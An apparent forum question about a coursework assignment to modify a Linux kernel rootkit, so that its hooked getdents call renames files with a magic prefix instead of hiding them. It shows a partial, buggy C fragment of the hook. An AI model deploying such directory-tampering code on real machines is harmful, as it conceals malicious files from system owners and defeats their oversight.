# getdents System call, return No such file or directory error message

Tags: linux-kernel, rootkit

I have an assignment to modify an existing rootkit to change the shown name instead of hidding it as how the getdents system call used. But I'm having an issue when I execute the ls command it shows the error message. Any way to supress that error and still showing the modified values?

This what I have in the code, I see the ret value i'm returning is the original one and that's probably what it's showing the error messages, what can i to do avoid/supress those messages?

```
while (off < ret) {
    dir = (void *)kdirent + off;
    if (memcmp(MAGIC_PREFIX, dir->d_name, strlen(MAGIC_PREFIX)) == 0){ 
        if (dir == kdirent) {
            printk(KERN_INFO "Entro if (dir == kdirent) 64v"); 
            snprintf(dir->d_name, NAME_MAX, "Oculto"); 
            //ret -= dir->d_reclen; 
            //memmove(dir, (void *)dir + dir->d_reclen, ret); 
            continue;
        }
        printk(KERN_INFO "No change: %s\n", dir->d_name); 
        snprintf(dir->d_name, NAME_MAX, "Oculto"); 
        //prev->d_reclen += dir->d_reclen; 

        printk(KERN_INFO "Change: %s\n", dir->d_name);
    } else
        prev = dir;
    off += dir->d_reclen;
}
err = copy_to_user(dirent, kdirent, ret);
if (err)
    goto out;
out:
    kfree(kdirent);
    return ret;
```

I thought about changing the ret as it stills hold the original values of the directory but not success or returning 0 but obviously that nulls the entire ls command.